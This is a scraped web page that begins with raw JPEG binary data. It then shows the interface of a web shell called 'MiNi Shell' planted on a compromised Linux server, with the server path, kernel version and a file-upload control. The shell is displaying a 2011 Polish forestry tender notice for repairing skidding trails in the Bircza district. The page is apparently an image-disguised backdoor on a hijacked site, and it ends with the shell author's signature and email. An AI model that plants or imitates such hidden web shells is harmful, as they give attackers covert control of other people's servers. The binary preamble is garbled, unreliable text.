JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111018/341254-N-2011.html

<p class="kh_header"><b>Bircza: Naprawa szlaków zrywkowych w Nadleśnictwie Bircza, w leśnictwach: Brzuska, Jasienica i Leszczawa</b><br>
<b>Numer ogłoszenia: 341254 - 2011; data zamieszczenia: 18.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Bircza , Stara Bircza 99, 37-740 Bircza, woj. podkarpackie, tel. 016 6725004, 6755343, faks 016 6725004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa szlaków zrywkowych w Nadleśnictwie Bircza, w leśnictwach: Brzuska, Jasienica i Leszczawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są naprawy szlaków zrywkowych w leśnictwach: Brzuska (oddziały 37 i 38), Jasienica (oddziały 66 i 68) i Leszczawa (oddział 214).
Zakres prac obejmuje m. in.:
a)  prace wykonywane sprzętem mechanicznym (koparka, spycharka, samochód ciężarowy) polegające na: 
- profilowaniu szlaku, ścięciu nierówności, usunięciu humusu i gruntu nadmiernie uwodnionego, 
- kopaniu rowów odwadniających, 
- uzupełnieniu ubytków i wyrw w szlaku gruntem dowiezionym z dokopu. 
b)  wykonanie odwodnienia szlaków za pomocą: 
-rurociągów przepustów o średnicy 40, 50, 60 cm obsypanych pospółką (materiał wykonawcy), 
-sączków z drewna odpadowego (żerdzi) pozyskanego na miejscu 
c)  utwardzenie (stabilizacja) szlaku zrywkowego: 
- z wykorzystaniem pospółki (materiał Wykonawcy dowieziony samochodem) 
- płytami drogowymi (materiał Wykonawcy dowieziony samochodem) 
- płytami JOMB (materiał Inwestora)
2.	Szczegółowy opis przedmiotu zamówienia zawiera:
- charakterystyka obiektów, zakres prac i warunki wykonania zamówienia wraz ze szkicami sytuacyjnymi, stanowiąca załącznik nr 2 do specyfikacji, 
- wzór kosztorysu ofertowego stanowiący załącznik nr 1b do specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6. Ustawy, polegających na wykonaniu usług zgodnych z przedmiotem niniejszego zamówienia (rozszerzeniu zakresu świadczonych usług) stanowiących do 50 % wartości zamówienia podstawowego. Zamówienia uzupełniające mogą być udzielone w okresie 3 lat od udzielenia zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2, 45.50.00.00-2, 14.21.00.00-6, 44.16.31.00-1, 44.17.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia zasobów w zakresie wiedzy i doświadczenia do wykonania zamówienia - Wykonawcy, którzy złożą oświadczenie spełnianiu warunku. w zakresie posiadania niezbędnej wiedzy i doświadczenia do wykonania zamówienia. Ocena spełnienia warunku w zakresie wiedzy i doświadczenia dokonywana będzie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia Wykonawcy o spełnieniu tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy dysponują potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego niezbędnego do wykonania zamówienia - Wykonawcy, którzy złożą oświadczenie iż spełniają warunki w zakresie dysponowania potencjałem technicznym do realizacji zamówienia. Ocena spełnienia warunku w zakresie dysponowania potencjałem niezbędnym do wykonania zamówienia dokonywana będzie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia Wykonawcy o spełnieniu tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia -wykonawcy, którzy złożą oświadczenie iż spełniają warunki w zakresie dysponowania osobami niezbędnymi do realizacji zamówienia. Ocena spełnienia warunku w zakresie dysponowania osobami zdolnymi do wykonania zamówienia dokonywana będzie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia Wykonawcy o spełnieniu tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału finansowego - Wykonawcy, którzy złożą oświadczenie, że znajdują się w sytuacji finansowej i ekonomicznej zapewniającej wykonanie zamówienia. Ocena spełnienia warunku w zakresie sytuacji ekonomicznej i finansowej dokonywana będzie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia Wykonawcy o spełnieniu tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać ponadto następujące dokumenty i oświadczenia
a) Pełnomocnictwo do złożenia oferty o ile nie wynika z innych dokumentów załączonych przez  Wykonawcę. 
b) Wypełniony formularz ofertowy zgodny w treści z wzorem stanowiącym załącznik nr 1a do SIWZ.
c) Kosztorys ofertowy (Formularz cenowy oferty) wypełniony wg. załączonego wzoru -  załącznik nr 1b do SIWZ (odrębnie dla każdej z części zamówienia).
d) Wykaz części zamówienia, które Wykonawca zamierza zlecić do wykonania Podwykonawcom załącznik nr 4 do SIWZ 
e) Pełnomocnictwo podmiotów występujących wspólnie (konsorcjum), jeśli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki istotnych  zmian umowy w stosunku do treści oferty.
1.  Zmiana terminów wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, uzasadniona może być jedynie okolicznościami leżącymi wyłącznie po stronie   Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy tj.:
- udzielenia zamówień dodatkowych lub uzupełniających, których wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego,
- wystąpienia siły wyższej, której wystąpienie ma wpływ na realizację umowy lub wystąpienie okoliczności zaistniałych w trakcie realizacji przedmiotu umowy utrudniających lub uniemożliwiających terminowe wykonanie przedmiotu umowy. Termin  siła wyższa oznacza osunięcia gruntu, długotrwałe intensywne opady, powódź i inne podobne nieprzewidywalne zdarzenia poza kontrolą którejkolwiek ze Stron i którym żadna ze Stron nie mogła zapobiec,
- czasowego wstrzymania realizacji robót przez Zamawiającego, wynikającego z obiektywnych i uzasadnionych przyczyn,
- w przypadku zmian w przepisach prawnych, działań organów administracji publicznej bądź działań osób trzecich wymagających wprowadzenia zmian w dokumentacji projektowej,  które wymuszą przerwanie prac. 
W przypadku zaistnienia jednej z powyższych okoliczności dopuszcza się możliwość przedłużenia terminu zakończenia prac określonego w ofercie (niniejszym ogłoszeniu). Przedłużenie terminu zakończenia robót nastąpi w formie aneksu do umowy i wymaga pisemnego wniosku Wykonawcy wraz z uzasadnieniem, zaakceptowanego  przez Zamawiającego. Przedłużenie terminu zakończenia prac nastąpi o okres wystąpienia niekorzystnych czynników uniemożliwiających realizację przedmiotu zamówienia.
2.  Zmiana zakresu przedmiotu umowy lub sposobu wykonywania przedmiotu umowy, wraz ze skutkami wprowadzenia tej zmiany (w tym skutkami finansowymi), przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy:
- zaistnienia warunków faktycznych wpływających na zakres lub sposób wykonywania przedmiotu umowy, które skutkują niemożliwością jej kontynuacji i są niezależne od stron,
- zmniejszenia przez Zamawiającego zakresu prac w stosunku do określonego w dokumentacji projektowej i w ofercie.
W przypadku zaistnienia jednej z powyższych okoliczności dopuszcza się możliwość zmiany zakresu przedmiotu umowy lub sposobu wykonywania przedmiotu umowy określonego w  dokumentacji projektowej. Zmiana taka nastąpi w formie aneksu do umowy i w  przypadkach zmiany zakresu przedmiotu zamówienia może się łączyć ze zmianą wynagrodzenia umownego.
3. Zmiana wynagrodzenia umownego, w zakresie wynikającym z:
- zmian zakresu przedmiotu umowy określonego w punkcie 2.
W przypadku zmniejszenia zakresu prac przez Zamawiającego, z wynagrodzenia Wykonawcy zostanie potrącona odpowiednia kwota obliczona  w oparciu o zaoferowane ceny jednostkowe wynikające  z kosztorysu ofertowego i  zredukowany zakres przedmiaru.
W przypadku zmian zakresu przedmiotu umowy (faktycznego wykonania odbiegającego od rozmiaru określonego w dokumentacji projektowej) nie spełniających kryterium zamówień dodatkowych określonych w art. 67 ust.1 pkt. 5 Ustawy,  dopuszcza się zmianę wynagrodzenia  za wykonanie przedmiotu umowy o kwotę wynikającą z zaoferowanych cen jednostkowych wynikających  z kosztorysu ofertowego i różnicę w faktycznym i projektowanym rozmiarze wykonania.
Zmiany takie nastąpią w formie aneksu do umowy.
- zmiany obowiązującej stawki podatku VAT
W przypadku zmiany w trakcie realizacji umowy obowiązującej stawki podatku od towarów i usług (VAT) nastąpi zmiana wynagrodzenia umownego proporcjonalnie do zmiany obowiązujących stawek. W takim przypadku wartość wynagrodzenia z tytułu realizacji niniejszej umowy obliczona będzie jako  iloczyn stawek jednostkowych netto podanych w ofercie za wykonanie poszczególnych prac i ich rozmiaru (wartość umowy netto pozostanie niezmienna) powiększona o podatek od towarów i usług, obliczony według stanu na dzień powstania obowiązku podatkowego. Zmiany takie nie wymagają aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_bircza/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Bircza, adres: Stara Bircza 99, 37-740 Bircza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2011 godzina 10:00, miejsce: Nadleśnictwo Bircza, adres: Stara Bircza 99, 37-740 Bircza - pokój 211 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie jest finansowane ze środków UE.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawa szlaków zrywkowych w leśnictwach Brzuska i Jasienica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są naprawy szlaków zrywkowych w leśnictwach: Brzuska (oddziały 37 i 38) i  Jasienica (oddziały 66 i 68). Zakres prac obejmuje m. in.:
a)  prace wykonywane sprzętem mechanicznym (koparka, spycharka, samochód ciężarowy) polegające na: 
- profilowaniu szlaku, ścięciu nierówności, usunięciu humusu i gruntu nadmiernie uwodnionego, 
- kopaniu rowów odwadniających, 
- uzupełnieniu ubytków i wyrw w szlaku gruntem dowiezionym z dokopu. 
b)  wykonanie odwodnienia szlaków za pomocą: 
-sączków z drewna odpadowego (żerdzi) pozyskanego na miejscu 
c)  utwardzenie (stabilizacja) szlaku zrywkowego: 
- z wykorzystaniem pospółki (materiał Wykonawcy dowieziony samochodem) 
- płytami drogowymi (materiał Wykonawcy dowieziony samochodem) 
- płytami JOMB (materiał Inwestora).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawa szlaków zrywkowych w leśnictwie Leszczawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są naprawy szlaków zrywkowych w leśnictwach: Brzuska (oddziały 37 i 38), Jasienica (oddziały 66 i 68) i Leszczawa (oddział 214).
Zakres prac obejmuje m. in.:
a)  prace wykonywane sprzętem mechanicznym (koparka, spycharka, samochód ciężarowy) polegające na: 
- profilowaniu szlaku, ścięciu nierówności, usunięciu humusu i gruntu nadmiernie uwodnionego, 
- kopaniu rowów odwadniających,  
b)  wykonanie odwodnienia szlaków za pomocą: 
-rurociągów przepustów o średnicy 40, 50, 60 cm obsypanych pospółką (materiał wykonawcy), 
-sączków z drewna odpadowego (żerdzi) pozyskanego na miejscu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com